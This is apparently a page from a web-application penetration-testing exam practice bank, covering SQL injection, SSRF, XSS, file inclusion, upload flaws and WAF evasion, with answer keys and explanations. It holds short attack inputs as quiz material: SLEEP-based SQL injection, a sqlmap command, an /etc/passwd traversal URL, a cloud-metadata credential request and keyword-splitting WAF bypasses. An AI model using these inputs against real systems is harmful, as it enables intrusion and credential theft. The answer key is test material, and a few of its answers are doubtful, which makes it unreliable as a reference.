E.The application does not sanitize or encode CRLF sequences (%0d%0a)
AnswersA, D, E

Input must be placed in headers for CRLF injection.

Why this answer

HTTP response splitting requires that attacker input is reflected in the response headers (e.g., via CRLF injection). The application must not sanitize CRLF sequences. The attacker can then inject headers to separate the response into two HTTP responses, enabling cache poisoning or XSS.

137
Multi-Selectmedium

Which TWO of the following are effective defenses against SQL injection attacks?

Select 2 answers
A.Implementing stored procedures with dynamic SQL
B.Disabling error messages
C.Using an ORM that generates parameterized queries
D.Using prepared statements with parameterized queries
E.Escaping user input with addslashes()
AnswersC, D

ORMs often use parameterization, providing defense.

Why this answer

Prepared statements (parameterized queries) and stored procedures (if properly parameterized) prevent SQL injection by separating data from code.

138
MCQmedium

A penetration tester attempts a SQL injection on a login form and receives no error messages, but notices a delay in the server response when injecting ' OR SLEEP(5)--. Which type of SQL injection is this?

A.Union-based SQL injection
B.Boolean-based blind SQL injection
C.Time-based blind SQL injection
D.Error-based SQL injection
AnswerC

The SLEEP function causes a delay, confirming time-based injection.

Why this answer

Time-based blind SQL injection relies on inducing a time delay to infer the truth of a condition, as no error or data is returned.

139
MCQmedium

Which of the following best describes a Server-Side Request Forgery (SSRF) attack?

A.An attacker tricks the server into making requests to internal or external resources
B.An attacker sends a malicious script that executes in a user's browser
C.An attacker forges HTTP requests to perform actions on behalf of an authenticated user
D.An attacker injects SQL commands into a database query
AnswerA

SSRF involves the server making requests on behalf of the attacker, often to internal systems.

Why this answer

A Server-Side Request Forgery (SSRF) attack occurs when an attacker manipulates a vulnerable server into making HTTP requests to arbitrary destinations, often bypassing network segmentation to access internal resources (e.g., 127.0.0.1, RFC 1918 addresses) or external services. The server acts as a proxy, allowing the attacker to interact with systems that are not directly reachable, such as cloud metadata endpoints (e.g., AWS http://169.254.169.254/latest/meta-data/) or internal databases.

Exam trap

The trap here is that candidates often confuse SSRF with CSRF (Option C) because both involve forged requests, but SSRF targets the server's ability to make requests to internal resources, while CSRF targets the user's browser to perform actions on their behalf.

How to eliminate wrong answers

Option B is wrong because it describes Cross-Site Scripting (XSS), where malicious scripts execute in a user's browser, not server-side requests. Option C is wrong because it describes Cross-Site Request Forgery (CSRF), where an attacker forges requests to perform actions on behalf of an authenticated user, but the server is tricked into sending requests to internal resources, not the user's browser. Option D is wrong because it describes SQL injection, where malicious SQL commands are injected into a database query, not HTTP requests made by the server.

140
MCQeasy

Which OWASP Top 10 (2021) category describes the vulnerability where an application allows an attacker to include a remote file from an external server, leading to code execution or data disclosure?

A.Security Misconfiguration (A05:2021)
B.Injection (A03:2021)
C.Broken Access Control (A01:2021)
D.Cryptographic Failures (A02:2021)
AnswerB

Injection includes SQL, OS, and LDAP injection, as well as file inclusion vulnerabilities like RFI.

Why this answer

Injection (A03:2021) covers various injection flaws, including Remote File Inclusion (RFI). RFI is a type of injection where user input is used to include a remote file, leading to code execution.

141
MCQmedium

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page?id=1' --batch --dbs. Which of the following best describes what this command will do?

A.Enumerate all database names in non-interactive mode
B.Dump the entire contents of the current database
C.Perform a time-based blind SQL injection to extract data
D.Enumerate all tables in all databases
AnswerA

--dbs tells SQLMap to list the available databases, and --batch runs automatically without manual prompts.

Why this answer

--dbs enumerates database names; --batch uses default options without interactive input.

142
MCQeasy

Which Burp Suite tool is specifically designed to intercept and modify HTTP(S) traffic between the browser and the target web application?

A.Intruder
B.Scanner
C.Repeater
D.Proxy
AnswerD

Burp Proxy captures and allows modification of HTTP/HTTPS traffic in real-time.

Why this answer

Burp Proxy is the component that intercepts and allows modification of requests/responses in transit.

143
MCQmedium

A security analyst identifies a vulnerability where an attacker can include a local file such as '/etc/passwd' by manipulating the 'page' parameter in the URL: http://example.com/index.php?page=../../../../etc/passwd. What type of attack is this?

A.Command injection
B.Local File Inclusion (LFI)
C.Directory traversal
D.Remote File Inclusion (RFI)
AnswerC

The use of '../' to navigate the file system is classic directory traversal. It allows reading arbitrary files.

Why this answer

Directory traversal (also known as path traversal) exploits insufficient input validation to access files outside the web root by using '..' sequences.

144
MCQmedium

A web application tester notices that the application reflects user input in the URL without proper encoding. The tester submits a payload <script>alert('xss')</script> in a search field and the script executes in the browser. Which type of XSS vulnerability is this MOST likely?

A.Blind XSS
B.Reflected XSS
C.Stored (persistent) XSS
D.DOM-based XSS
AnswerB

The payload is reflected immediately in the response and not stored, which is characteristic of reflected XSS.

Why this answer

Reflected XSS occurs when user input is immediately returned by the server in the response without proper sanitization. The script executes once and is not stored, distinguishing it from stored XSS. DOM-based XSS would involve client-side JavaScript manipulation without server reflection.

145
MCQmedium

A web application is vulnerable to server-side request forgery (SSRF). An attacker sends a request that causes the server to make an internal HTTP request to http://169.254.169.254/latest/meta-data/. What is the attacker attempting to achieve?

A.Exploit a command injection vulnerability in the web server
B.Access the cloud instance metadata to obtain temporary credentials
C.Perform a denial-of-service attack on the internal network
D.Perform a port scan on the internal network
AnswerB

Cloud metadata endpoints often contain access tokens and secrets.

Why this answer

169.254.169.254 is the metadata IP address for cloud providers like AWS. The attacker is trying to retrieve instance metadata, which may contain credentials (e.g., IAM role credentials).

146
MCQmedium

Which of the following describes a Server-Side Request Forgery (SSRF) attack?

A.An attacker tricks a user into clicking a link that executes unwanted actions on a web application where the user is authenticated.
B.An attacker injects malicious scripts into a web page that executes in other users' browsers.
C.An attacker forces the web server to make HTTP requests to arbitrary destinations, potentially accessing internal resources.
D.An attacker manipulates input to execute system commands on the server.
AnswerC

This is the definition of SSRF.

Why this answer

SSRF occurs when an attacker can induce the server to make HTTP requests to internal or external resources. This can lead to accessing internal services (e.g., cloud metadata endpoints) that are not normally accessible from the outside.

147
MCQmedium

A penetration tester uses Burp Suite Repeater to manually modify and resend HTTP requests to a web server. In which phase of the testing methodology is this tool most commonly employed?

A.Reconnaissance
B.Reporting
C.Exploitation
D.Scanning and enumeration
AnswerC

Repeater is commonly used to exploit vulnerabilities like SQLi, XSS, etc., by sending crafted requests.

Why this answer

Burp Suite Repeater is used to manually craft and reissue requests, typically during the exploitation phase after identifying potential vulnerabilities. It allows testing parameter manipulation, injection payloads, and observing responses.

148
MCQmedium

A web application allows users to upload profile images. An attacker uploads a file named 'image.php.png' with malicious PHP code, and the server executes it as PHP. Which type of vulnerability is this?

A.Directory traversal
B.Command injection
C.SQL injection
D.Unrestricted file upload
AnswerD

The vulnerability is due to lack of validation on uploaded files.

Why this answer

Unrestricted file upload vulnerabilities allow attackers to upload executable files if the server does not validate the file type or execute permissions.

149
MCQhard

A web application firewall (WAF) blocks requests containing ' UNION SELECT '. A penetration tester wants to bypass this restriction to perform a union-based SQL injection. Which of the following techniques is MOST likely to succeed?

A.Use double URL encoding: '%25%35%35%25%34%65%25%34%39...'
B.Use hex encoding: '0x554e494f4e2053454c454354'
C.Use URL encoding: '%55%4e%49%4f%4e%20%53%45%4c%45%43%54'
D.Use inline comments: 'UN/**/ION/**/SE/**/LECT'
AnswerD

Inline comments break up keywords and evade simple signature-based WAF rules.

Why this answer

Using comments or alternative encoding can bypass WAF rules. Inline comments like '/**/' can break up keywords.

150
MCQeasy

A security analyst notices that a web application returns different page sizes when a valid user ID is submitted versus an invalid one in the URL parameter. Which type of vulnerability is most likely being exploited?

A.Stored Cross-Site Scripting (XSS)
B.Insecure Direct Object Reference (IDOR)
C.Cross-Site Request Forgery (CSRF)
D.SQL Injection
AnswerB

IDOR occurs when an application exposes internal object references (e.g., user IDs) and allows unauthorized access by modifying them.

Why this answer

This is a classic indicator of an Insecure Direct Object Reference (IDOR) vulnerability, where an attacker can enumerate valid IDs by observing differences in responses.

← PreviousPage 2 of 3 · 172 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Web Application and Injection Attacks questions.